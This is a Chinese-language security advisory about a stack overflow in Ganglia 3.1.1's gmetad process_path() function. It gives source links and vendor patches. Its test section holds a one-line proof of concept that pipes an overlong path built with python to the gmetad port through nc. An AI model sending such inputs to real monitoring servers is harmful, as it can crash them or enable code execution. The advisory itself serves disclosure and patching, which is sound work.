发布日期：2009-01-15
更新日期：2009-01-19

受影响系统：

Ganglia Ganglia 3.1.1

描述：

---

BUGTRAQ  ID: 33299

Ganglia是一个开源项目，为高性能计算系统（例如集群和网格）提供了一个免费的可扩展分布式监控系统。

Ganglia的gmetad/server.c文件中的process_path()函数没有执行边界检查，如果远程攻击者向gmetad服务提交的请求中路径单元长于strncpy调用写入到无效内存位置服务的长度的话，就可以触发栈溢出，导致执行任意代码。

<*来源：Spike Spiegel
  
  链接：http://secunia.com/advisories/33506/
        http://bugzilla.ganglia.info/cgi-bin/bugzilla/long_list.cgi?buglist=223
        ganglia-developers@lists.sourceforge.net/msg04929.html" target="_blank">http://www.mail-archive.com/ganglia-developers@lists.sourceforge.net/msg04929.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652

建议：

---

厂商补丁：

Ganglia
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

ganglia-developers@lists.sourceforge.net/msg04929/server-c-bof-dos.diff" target="_blank">http://www.mail-archive.com/ganglia-developers@lists.sourceforge.net/msg04929/server-c-bof-dos.diff
ganglia-developers@lists.sourceforge.net/msg04929/server-c-multi-item-request.diff" target="_blank">http://www.mail-archive.com/ganglia-developers@lists.sourceforge.net/msg04929/server-c-multi-item-request.diff

浏览次数：2906
严重程度：0（网友投票）